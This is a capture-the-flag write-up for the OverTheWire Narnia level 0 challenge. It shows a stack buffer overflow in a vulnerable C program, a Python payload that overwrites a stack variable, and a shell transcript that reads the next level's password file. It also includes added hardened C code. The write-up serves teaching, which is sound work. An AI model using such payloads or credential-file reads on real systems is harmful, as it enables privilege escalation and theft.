OverTheWire.org - Narnia - Level 0 Writeup

This is the first of a series of posts showing some exploitation techniques.
There are many sites that give you the chance to experiment: one of the best I've played with in the past is overthewire.org, which runs a number of different challenges. Some are web related, others are based on the Linux shell.

Let's start with a basic Linux shell challenge: Narnia

The host is a Debian Linux x64 box (kernel 4.18.12) on which the challenge binaries are compiled for 32-bit x86 with no ASLR and no other protection techniques (stack canaries, etc.).

The vulnerable program for the first level is narnia0 (source in narnia0.c), located in the /narnia/ directory:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(){
    long val=0x41414141;      /* the target: must become 0xdeadbeef */
    char buf[20];             /* 20-byte buffer, placed right before val on the stack */

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);       /* reads up to 24 characters into a 20-byte buffer */

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());   /* switch to the effective uid, i.e. narnia1 */
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

If we are able to change the val variable from hexadecimal 0x41414141 to 0xdeadbeef, we receive a shell with narnia1 privileges.

Clearly the vulnerability is in the scanf() call: the "%24s" conversion permits reading up to 24 characters (plus the terminating NUL) and stores them in buf, which is only 20 bytes long.

Submitting 24 bytes of input therefore overflows buf and completely overwrites the variable that sits right after it on the stack, i.e. val, which is 4 bytes long.

So we have to submit 20 bytes (with no special characters such as NULL, \n or \r) followed by the 4 bytes of 0xdeadbeef in little-endian order.
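The root cause above is a field width chosen independently of the buffer size. The following C program is an added example, not part of the original post or of the Narnia sources: it derives the scanf width from sizeof the destination (producing "%19s" for a 20-byte buffer) and then feeds a 24-byte line through it to show that the neighbouring value is left untouched. The struct `locals`, the input string and the function names `make_bounded_format`, `hardened_read` and `val_survives` are all constructed for this example; the real stack layout of narnia0 is decided by the compiler.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical layout mirroring narnia0's two locals: a 20-byte buffer
   followed by the value that must stay intact. Constructed for this example. */
struct locals {
    char buf[20];
    long val;
};

/* Build a scanf conversion such as "%19s" whose field width is bufsz - 1,
   leaving room for the terminating NUL that scanf always appends.
   Returns 0 on success, -1 if the buffer is too small or fmt cannot hold it. */
int make_bounded_format(char *fmt, size_t fmtsz, size_t bufsz) {
    if (bufsz < 2)
        return -1;
    int n = snprintf(fmt, fmtsz, "%%%zus", bufsz - 1);
    return (n > 0 && (size_t)n < fmtsz) ? 0 : -1;
}

/* Hardened counterpart of scanf("%24s", &buf): the width comes from the
   destination size, so oversized input is truncated instead of spilling into
   whatever sits after buf. Reads from a string so it can be exercised offline. */
int hardened_read(const char *input, char *buf, size_t bufsz) {
    char fmt[16];
    if (make_bounded_format(fmt, sizeof fmt, bufsz) != 0)
        return -1;
    return sscanf(input, fmt, buf) == 1 ? 0 : -1;
}

/* Push an oversized line through hardened_read and report whether val survived.
   Returns 1 if val is unchanged and buf is NUL-terminated within bounds, else 0. */
int val_survives(const char *input) {
    struct locals l;
    l.val = 0x41414141;
    memset(l.buf, 0, sizeof l.buf);
    if (hardened_read(input, l.buf, sizeof l.buf) != 0)
        return 0;
    return l.val == 0x41414141 && strlen(l.buf) < sizeof l.buf;
}

int main(void) {
    /* Constructed input: 24 bytes, the same length the original "%24s" accepts. */
    const char *oversized = "AAAAAAAAAAAAAAAAAAAAAAAA";
    struct locals probe;
    char fmt[16];

    make_bounded_format(fmt, sizeof fmt, sizeof probe.buf);
    printf("bounded format: %s\n", fmt);
    printf("val intact after oversized input: %s\n",
           val_survives(oversized) ? "yes" : "no");
    return 0;
}
```

The same guarantee can be had with fgets(buf, sizeof buf, stdin), which also takes the size from the destination; what matters in either case is that the limit cannot drift away from the buffer it protects, as "%24s" did here.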

We can use Python to generate such a sequence; pay attention to the SSH client's character encoding, which can mangle the non-ASCII bytes in the output.

Then copy the output and paste it into narnia0, running narnia0 directly from the bash shell:
piping the Python output into narnia0 does not seem to work correctly.


narnia0@narnia:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde" + "AAAA"'
AAAAAAAAAAAAAAAAAAAAï¾­ÞAAAA
narnia0@narnia:/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAï¾­ÞAAAA
buf: AAAAAAAAAAAAAAAAAAAAï¾­Þ
val: 0xdeadbeef
$ id
uid=14001(narnia1) gid=14000(narnia0) groups=14000(narnia0)
$ cat /etc/narnia_pass/narnia1
e********e
$
